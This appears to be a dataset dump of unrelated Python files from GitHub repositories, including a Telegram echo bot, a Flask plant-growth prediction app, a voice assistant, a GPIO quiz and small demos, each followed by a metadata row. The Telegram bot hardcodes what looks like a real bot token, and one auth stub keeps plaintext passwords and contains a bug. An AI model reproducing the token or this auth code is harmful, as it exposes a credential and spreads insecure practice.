reg_name = "test02.reg"
r = stregion.open(reg_name).as_imagecoord(header)
m = r.get_mask(shape=shape)
ax = plt.subplot(122)
plt.imshow(m, origin="lower")
patch_list, text_list = r.get_mpl_patches_texts()
for p in patch_list:
ax.add_patch(p)
for t in text_list:
ax.add_artist(t)
plt.show()
| UTF-8 | Python | false | false | 1,171 | py | 26 | demo_region_filter01.py | 17 | 0.684885 | 0.672075 | 0 | 54 | 20.666667 | 49 |
clarkngo/cjn-python | 15,917,148,814,168 | 9c3b64c25ef79febdc94e7235a32c905dee12f6e | 560212fbb6a00235edcbf1ec24188c3a077c67e3 | /test4/code/security(older).py | 7035257076063d863e80e18933824bf05e834ac5 | []
| no_license | https://github.com/clarkngo/cjn-python | 5c5d26d24cdd48d494dbab55a44dff406cf3e8b8 | 3cf8265eac72e0b8bfbd2a1f1869cbe4bd54e88b | refs/heads/master | 2020-03-12T03:15:49.899501 | 2018-04-20T22:59:59 | 2018-04-20T22:59:59 | 130,420,859 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | users = [
{
'id':1,
'username': 'bob',
'password': 'asdf'
}
]
username_mapping = {'bob': {
'id': 1,
'username': 'bob',
'password': 'asdf'
}
}
userid_mapping = { 1 : {
'id': 1,
'username': 'bob',
'password': 'asdf'
}
}
def authenticate(username, password):
user = username_mapping.get(username, None)
if user and user.password == password:
return user
def identity(payload):
user_id = payload['identity']
return userid_mapping.get(user_id, None)
| UTF-8 | Python | false | false | 481 | py | 12 | security(older).py | 8 | 0.602911 | 0.594595 | 0 | 32 | 14.03125 | 44 |
Kritik07/IOT | 5,068,061,429,809 | 18909720c64dac3c6ab2ea6932dbfde594a260de | f421e7704e62d665702ef173f7a5a6d8379f3e65 | /PRAC1.py | 264d27c24f21683c9403833be975fd88120c1a01 | []
| no_license | https://github.com/Kritik07/IOT | 1bfa875d563825ad19290998e17c38b4fc971888 | 07d3776f2702af62cbdf77a2a90d04ed120d7112 | refs/heads/master | 2022-12-17T00:14:22.338921 | 2020-09-14T13:52:50 | 2020-09-14T13:52:50 | 295,321,608 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import telepot
token='1234280727:AAFM3LKbA6dVZER3Cl2jXELfQhuPNgX2vOI'
bot = telepot.Bot(token)
print (bot.getMe())
def handle(msg):
content_type, chat_type, chat_id = telepot.glance(msg)
print(content_type, chat_type, chat_id)
if content_type == 'text':
bot.sendMessage(chat_id,"You said '{}'".format(msg['text']))
bot.message_loop(handle)
| UTF-8 | Python | false | false | 376 | py | 2 | PRAC1.py | 1 | 0.675532 | 0.635638 | 0 | 15 | 24.066667 | 68 |
luhralive/python | 3,547,643,033,952 | b604047d1944245783b011252f385742a3596147 | 45de13a618813455a3ea1e65c5dd31066b311cd7 | /kamen/0009/0009.py | cf961eec554b7991f7a4ff0b3dce963bf261f955 | []
| permissive | https://github.com/luhralive/python | bbee0a3e7d0ac9845db484595362bba41923c2a4 | b74bdc4c7bc8e75aee9530c27d621a773a71ac67 | refs/heads/master | 2020-05-19T12:48:17.144882 | 2019-05-05T11:53:46 | 2019-05-05T11:53:46 | 185,023,995 | 1 | 0 | MIT | true | 2019-05-05T11:45:42 | 2019-05-05T11:45:41 | 2019-05-05T05:39:52 | 2019-03-26T14:19:59 | 110,745 | 0 | 0 | 0 | null | false | false | from bs4 import BeautifulSoup
from urllib import urlopen
r = urlopen('http://sports.sina.com.cn/nba/2015-04-23/00007584374.shtml').read()
soup = BeautifulSoup(r)
#there is javasciript things to be cleaned.
s = soup.find_all("a")
for link in s:
try:
print link["href"]
except KeyError:
pass
| UTF-8 | Python | false | false | 316 | py | 832 | 0009.py | 633 | 0.686709 | 0.623418 | 0 | 12 | 25.25 | 80 |
lalodsi/TallerDjangoWithAxel | 10,264,971,842,609 | 0994e3372eab720861258238a25ddccc262dc3f8 | 55ea05a4e36bac33b48f08cfb664a05277927235 | /control_escolar/matricula/apps.py | f4878490cd018a2628e43c6957d0961e1695126c | []
| no_license | https://github.com/lalodsi/TallerDjangoWithAxel | b74832a472f911f1cb28c1d7e9c3bfc5cd7af204 | b8c8acc6f2aba1fa173e3d5ecbc554adf0e8cdb3 | refs/heads/master | 2023-07-06T21:54:32.465990 | 2021-08-14T03:38:31 | 2021-08-14T03:38:31 | 317,130,256 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """" En este modulo se encuentran todas la aplicaciones"""
from django.apps import AppConfig
class MatriculaConfig(AppConfig):
name = 'matricula'
verbose_name = 'Matriculas'
| UTF-8 | Python | false | false | 186 | py | 10 | apps.py | 7 | 0.725806 | 0.725806 | 0 | 9 | 19.666667 | 58 |
supersteph/pytorch-openai-transformer-lm | 13,022,340,884,859 | 833540e438807ec9c3368ba36e300297cf77bd0b | 4f28d7446cfe8c484e440b3d826a9a98c75a4b45 | /test.py | 3de4b214a27d5cf553c8dc27f5f476cd5500652c | [
"MIT"
]
| permissive | https://github.com/supersteph/pytorch-openai-transformer-lm | b70aefd3bac72034f2e2bf38943b98989e09d574 | a31e739b1d3d3a2de5c8e05d54e7540a9842ed4a | refs/heads/master | 2020-07-20T14:11:16.594820 | 2019-12-20T08:04:52 | 2019-12-20T08:04:52 | 206,656,464 | 0 | 0 | MIT | true | 2019-09-05T20:59:53 | 2019-09-05T20:59:53 | 2019-09-05T09:12:05 | 2019-02-07T21:40:39 | 273 | 0 | 0 | 0 | null | false | false | import datetime as dt
start = dt.datetime.now()
t = dt.datetime.now()
i = 0
while True:
delta=dt.datetime.now()-t
if delta.seconds >= 60:
i+=1
print(i)
t = dt.datetime.now() | UTF-8 | Python | false | false | 181 | py | 6 | test.py | 6 | 0.651934 | 0.629834 | 0 | 10 | 17.2 | 26 |
fachrytarigan/plant-area-prediction-using-flask-and-linear-regression | 283,467,849,813 | e2463f684a39c8b5ae69cbe34766ab88b799cf25 | c3e79c2d2d22129290764b0bb05f7eccec233bfe | /app.py | 80e9796cc63afdebd4a59431741bf452c9154b51 | []
| no_license | https://github.com/fachrytarigan/plant-area-prediction-using-flask-and-linear-regression | 72c8699c45b2dd121fadc62e923a49a2161917e4 | 775252bb9c7afe37020573c4327b9335568d2434 | refs/heads/master | 2023-03-20T00:16:11.573545 | 2021-03-22T14:15:06 | 2021-03-22T14:15:06 | 333,450,432 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask, redirect, url_for, render_template, request, flash
from werkzeug.utils import secure_filename
from werkzeug.datastructures import FileStorage
from sklearn import linear_model
import pandas as pd
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.figure import Figure
from sklearn.linear_model import LinearRegression
import pickle
import base64
from io import BytesIO
import matplotlib.pyplot as plt
app = Flask(__name__)
app.secret_key = 'random string'
model_width_filename = 'width_predict_model.ml'
model_height_filename = 'height_predict_model.ml'
model_non_zero_filename = 'non_zero_predict_model.ml'
model_width = pickle.load(open(model_width_filename, 'rb'))
model_height = pickle.load(open(model_height_filename, 'rb'))
model_non_zero = pickle.load(open(model_non_zero_filename, 'rb'))
@app.route('/', methods=['POST', 'GET'])
def index():
return render_template("index.html")
@app.route('/predict', methods=['POST'])
def predict():
if request.method == 'POST':
suhu_air = float(request.form['suhu_air'])
tds = float(request.form['tds'])
features = [[suhu_air, tds]]
width_predict = model_width.predict(features)
height_predict = model_height.predict(features)
non_zero_predict = model_non_zero.predict(features)
import math
output_width = math.trunc(width_predict[0])
output_height = math.trunc(height_predict[0])
output_non_zero = math.trunc(non_zero_predict[0])
from datetime import datetime
namafile = datetime.now().strftime("%Y%m%d-%H%M%S")
width_predict_image = visual_width(suhu_air, tds, namafile)
height_predict_image = visual_height(suhu_air, tds, namafile)
non_zero_predict_image = visual_nonzero(suhu_air, tds, namafile)
context = {
"suhu_air": suhu_air,
"tds": tds,
"width_predict_image" : width_predict_image,
"height_predict_image" : height_predict_image,
"non_zero_predict_image": non_zero_predict_image
}
return render_template("predict.html", context=context)
else:
url_for('index')
def visual_width(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1, 2)
Y_WIDTH = df['width']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_WIDTH #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_width_biru = LinearRegression()
model_width_biru = ols_width_biru.fit(X, Y_WIDTH)
predicted_width_biru = model_width_biru.predict(model_viz_biru)
ols_width_merah = LinearRegression()
model_width_merah = ols_width_merah.fit(X, Y_WIDTH)
predicted_width_merah = model_width_merah.predict(model_viz_merah)
r2 = model_width_merah.score(X, Y_WIDTH)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_width_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_width_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Width Prediction = %f Pixels' % predicted_width_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-width.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
def visual_height(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1,2)
Y_HEIGHT = df['height']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_HEIGHT #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_height_biru = LinearRegression()
model_height_biru = ols_height_biru.fit(X, Y_HEIGHT)
predicted_height_biru = model_height_biru.predict(model_viz_biru)
ols_height_merah = LinearRegression()
model_height_merah = ols_height_merah.fit(X, Y_HEIGHT)
predicted_height_merah = model_height_merah.predict(model_viz_merah)
r2 = model_height_merah.score(X, Y_HEIGHT)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_height_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_height_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Height Prediction = %f Pixels' % predicted_height_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-height.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
def visual_nonzero(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1,2)
Y_NON_ZERO = df['non_zero']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_NON_ZERO #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_non_zero_biru = LinearRegression()
model_non_zero_biru = ols_non_zero_biru.fit(X, Y_NON_ZERO)
predicted_non_zero_biru = model_non_zero_biru.predict(model_viz_biru)
ols_non_zero_merah = LinearRegression()
model_non_zero_merah = ols_non_zero_merah.fit(X, Y_NON_ZERO)
predicted_non_zero_merah = model_non_zero_merah.predict(model_viz_merah)
r2 = model_non_zero_merah.score(X, Y_NON_ZERO)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_non_zero_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_non_zero_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Leaf Area Prediction = %f' % predicted_non_zero_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-non-zero.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
if __name__ == '__main__':
app.run(debug=True)
| UTF-8 | Python | false | false | 12,939 | py | 7 | app.py | 1 | 0.591914 | 0.557514 | 0 | 322 | 39.173913 | 150 |
pandix73/Python_learning | 4,406,636,476,059 | 4ce55c7044eb3cd19721c12de2b373da46dc0289 | c86f670a3dd715bf522ef899ca826b8a074e1c6b | /tensorflow/test2.py | 9b7d113af68a3c1ccb22d2f1613beaa68ae36bb1 | []
| no_license | https://github.com/pandix73/Python_learning | ac4b8114aab765a92821588bf3c282e965056183 | d4f75f347a13f777da62fdc158a3ef8434e9fdce | refs/heads/master | 2021-01-17T14:57:10.716009 | 2017-08-03T02:12:05 | 2017-08-03T02:12:05 | 48,616,296 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import numpy as np
import tensorflow as tf
x = np.random.rand(100).astype(np.float32)
y = 0.5*x*x + 1
weight = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
weight2 = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
weight3 = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
biase = tf.Variable(tf.zeros([1]))
biase2 = tf.Variable(tf.zeros([1]))
linear_y = weight*x + biase
quadratic_y = weight2*x*x + weight3*x + biase2
linear_loss = tf.reduce_mean(tf.square(y-linear_y))
quadratic_loss = tf.reduce_mean(tf.square(y-quadratic_y))
optimizer = tf.train.GradientDescentOptimizer(0.5)
linear_train = optimizer.minimize(linear_loss)
quadratic_train = optimizer.minimize(quadratic_loss)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(201):
sess.run(linear_train)
sess.run(quadratic_train)
if step%20 == 0:
print(step, 'linear', sess.run(linear_loss))
print(step, 'quadratic', sess.run(quadratic_loss))
| UTF-8 | Python | false | false | 1,024 | py | 30 | test2.py | 28 | 0.695313 | 0.65625 | 0 | 32 | 31 | 58 |
ppaka/pystudy | 3,564,822,858,369 | 0eb9fca2c1fc70b8c9b003daddb523048293d78a | 3bf74549c7ddb798ace9fa62bfb47f0fff0f1a07 | /game homework/chopstickGame/main.py | 6eff1977aeec3b9c16b168086df19d3cae40317a | []
| no_license | https://github.com/ppaka/pystudy | b1a5e5bc50a84a87a77ae205adc8cd5d242ea72b | 7543b18a9d255dd5e4676927450c075d703be8cd | refs/heads/main | 2023-06-09T03:30:25.199582 | 2021-06-22T05:02:29 | 2021-06-22T05:02:29 | 348,222,051 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | player_cs_left = 1
player_cs_right = 1
player_second_cs_left = 1
player_second_cs_right = 1
player_turn = 1
gameOver = False
who_win = ""
def game():
global gameOver, who_win
if player_cs_left == 0 and player_cs_right == 0:
gameOver = True
who_win = "player2"
elif player_second_cs_left == 0 and player_second_cs_right == 0:
gameOver = True
who_win = "player1"
def select_what_to_do():
the_select = str(input("[공격, 나누기 중에 하나를 골라주세요]\n"))
if the_select == "공격":
if player_turn == 1:
get_first_player_input()
elif player_turn == 2:
get_second_player_input()
elif the_select == "나누기":
if player_turn == 1:
separate("player1")
elif player_turn == 2:
separate("player2")
def get_first_player_input():
hand = str(input("[플레이어1, 당신의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if hand == "왼손":
atk_hand = str(input("[플레이어1, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("left", "left", "player1")
elif atk_hand == "오른손":
add_cs("left", "right", "player1")
elif hand == "오른손":
atk_hand = str(input("[플레이어1, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("right", "left", "player1")
elif atk_hand == "오른손":
add_cs("right", "right", "player1")
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
get_first_player_input()
def get_second_player_input():
hand = str(input("[플레이어2, 당신의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if hand == "왼손":
atk_hand = str(input("[플레이어2, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("left", "left", "player2")
elif atk_hand == "오른손":
add_cs("left", "right", "player2")
elif hand == "오른손":
atk_hand = str(input("[플레이어2, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("right", "left", "player2")
elif atk_hand == "오른손":
add_cs("right", "right", "player2")
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
get_first_player_input()
def add_cs(selected_hand, target_hand, now_turn):
global player_second_cs_left, player_cs_left, player_second_cs_right, player_cs_right, player_turn
if selected_hand == "left" and target_hand == "left":
if now_turn == "player1":
player_second_cs_left += player_cs_left
elif now_turn == "player2":
player_cs_left += player_second_cs_left
elif selected_hand == "left" and target_hand == "right":
if now_turn == "player1":
player_second_cs_right += player_cs_left
elif now_turn == "player2":
player_cs_right += player_second_cs_left
elif selected_hand == "right" and target_hand == "left":
if now_turn == "player1":
player_second_cs_left += player_cs_right
elif now_turn == "player2":
player_cs_left += player_second_cs_right
elif selected_hand == "right" and target_hand == "right":
if now_turn == "player1":
player_second_cs_right += player_cs_right
elif now_turn == "player2":
player_cs_right += player_second_cs_right
if player_cs_left >= 5:
player_cs_left = 0
if player_cs_right >= 5:
player_cs_right = 0
if player_second_cs_left >= 5:
player_second_cs_left = 0
if player_second_cs_right >= 5:
player_second_cs_right = 0
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left, player_second_cs_right)
if now_turn == "player1":
player_turn = 2
elif now_turn == "player2":
player_turn = 1
game()
def separate(now_turn):
global player_cs_right, player_cs_left, player_second_cs_left, player_second_cs_right, player_turn
selected = input("[나눠질 결과를 적어주세요(각 손은 ,로 구분)]\n")
splited = selected.split(',')
both = int(splited[0]) + int(splited[1])
if now_turn == "player1":
if both == (player_cs_left + player_cs_right):
player_cs_left = splited[0]
player_cs_right = splited[1]
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left,
player_second_cs_right)
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
separate("player1")
elif now_turn == "player2":
if both == (player_second_cs_left + player_second_cs_right):
player_second_cs_left = splited[0]
player_second_cs_right = splited[1]
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left,
player_second_cs_right)
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
separate("player2")
if now_turn == "player1":
player_turn = 2
elif now_turn == "player2":
player_turn = 1
def start():
while True:
select_what_to_do()
if gameOver:
print("")
break
start()
| UTF-8 | Python | false | false | 5,814 | py | 41 | main.py | 40 | 0.550039 | 0.536215 | 0 | 156 | 31.923077 | 117 |
brainspork/RaspberryPI-GPIO-Learning | 14,130,442,435,996 | 00d7dbfcda8069c4e56ec782715482e34c961186 | c18a9164b32a1309f10820643e7d26df2df5dd40 | /gpio/twoButton.py | b8d55ca4a58d891c96bfc5571893acb82115d04f | []
| no_license | https://github.com/brainspork/RaspberryPI-GPIO-Learning | 03218b3f595a3b3d849bae938338e1e23bd68b1c | 3b26bbcaea394af6ba116eb4ea4baf33eb4e650c | refs/heads/master | 2023-07-09T17:27:11.761028 | 2021-08-11T19:14:01 | 2021-08-11T19:14:01 | 395,093,284 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import RPi.GPIO as GPIO
import time
# Sets up for pin numbers (alt GPIO.BCM)
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
# True, False
in_list = [36, 32]
# Green, Red
out_list = [22, 40]
GPIO.setup(in_list, GPIO.IN)
GPIO.setup(out_list, GPIO.OUT)
questions = [
["Is 3 > 4?", False],
["Is the sky blue?", True],
["You can convert a int to a string in python with string concatination", False]
]
correct_count = 0
def validate_input(answer, actual):
correct = answer == actual
c = 0
if correct:
GPIO.output(22, True)
c = 1
else:
GPIO.output(40, True)
return c
for q in questions:
answered = False
print(q[0])
while answered == False:
true_in = GPIO.input(36)
false_in = GPIO.input(32)
if true_in == False:
print('Pressed True')
correct_count += validate_input(True, q[1])
answered = True
while true_in == False:
true_in = GPIO.input(36)
if false_in == False:
print('Pressed False')
correct_count += validate_input(False, q[1])
answered = True
while false_in == False:
false_in = GPIO.input(32)
if answered == True:
time.sleep(1)
GPIO.output(22, False)
GPIO.output(40, False)
print("Quiz complete, score " + str(correct_count) + "/" + str(len(questions)))
GPIO.cleanup(in_list + out_list) | UTF-8 | Python | false | false | 1,484 | py | 7 | twoButton.py | 5 | 0.558625 | 0.536388 | 0 | 66 | 21.5 | 84 |
masabumair023/Virtual-Assistant-Python | 953,482,745,681 | b6d560f1e201af9bdfa0f78e058b6908891f6782 | 21b3bf05c1cba2a6ad017bcb1cdd770c7ae7c129 | /Togo (Virtual Assistant).py | 72fd0d3c17651258d354695d3efd77309cb22f4c | []
| no_license | https://github.com/masabumair023/Virtual-Assistant-Python | f11b8a0a55cc72ad5bebbfc99d7df834feb9d21d | 3f14af036ce3a428ab7e6781f4fc66a35be0a961 | refs/heads/master | 2023-07-02T11:39:35.870596 | 2021-08-08T11:00:25 | 2021-08-08T11:00:25 | 393,933,906 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pyttsx3 # text to speech converter, offline module
import datetime # to get the time
import wikipedia # to get something from wikipedia
import webbrowser # to work with browsers
import os # to deal with files and directories
import random # to generate random numbers
import speech_recognition as sr # it will understand and interpret the commands given by the user
import smtplib #used to send emails using gmail account
engine = pyttsx3.init('sapi5') # initialize puttsx3 with sapi(windows in biult speech recognition API)
voices = engine.getProperty('voices') # used to get the in built windows voices
engine.setProperty('voice',voices[1].id) # set the desired voice
def speak(audio):
"""
This function converts the text into audio
"""
engine.say(audio)
engine.runAndWait()
def greetings():
"""
This function greets the user according to time
"""
hours = int(datetime.datetime.now().hour) # take the current time in hours
if hours>0 and hours<12:
speak("Good Morning Masab")
elif hours>=12 and hours<18:
speak("Good Afternoon Masab")
else:
speak("Good Evening Masab")
speak("My name is TOGO and i am your virtual assistant. How may i help you sir?")
def takeCommand():
"""
This function takes microphone input form the user and returns a string output
"""
r = sr.Recognizer() # Recognizer() will recognize the input
with sr.Microphone() as source:
print("Listening....")
r.pause_threshold = 1 # ctrl+click
audio = r.listen(source)
try:
#Recognizing the audio that is said by the user
print("Recognizing.....")
query = r.recognize_google(audio,language="en-us")
print(f"User said: {query}\n")
except Exception as e:
print(e)
speak("Please say that again.....")
return "None"
return query
def sendEmail(to,content):
"""
This function send mails using gmail account
"""
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('your email id','your password') # enter your gmail and password here
server.sendmail('your email id',to,content)
server.close()
if __name__ == "__main__":
greetings()
while True:
query = takeCommand().lower()
# Logic to execute tasks based on query
if 'wikipedia' in query:
speak("Searching wikipedia...")
query = query.replace("wikipedia","")
results = wikipedia.summary(query, sentences=1)
speak("According to wikipedia")
print(results)
speak(results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'play music' in query:
music_dir = "E:\\SONGS"
songs = os.listdir(music_dir)
random_song = random.randint(0,len(songs))
os.startfile(os.path.join(music_dir,songs[random_song]))
elif 'the time' in query:
time = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"The time is {time}")
elif 'open code' in query:
vscodePath = "C:\\Users\\LENOVO\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(vscodePath)
#You'll need to allow less secure apps in gmail to send the emails
elif 'send email' in query:
try:
speak("Please say what do you want to send")
content = takeCommand()
to = "email@gmail.com" # Type here the email id whom you want to send the email
sendEmail(to,content)
speak("Email has been sent!")
except Exception as e:
print(e)
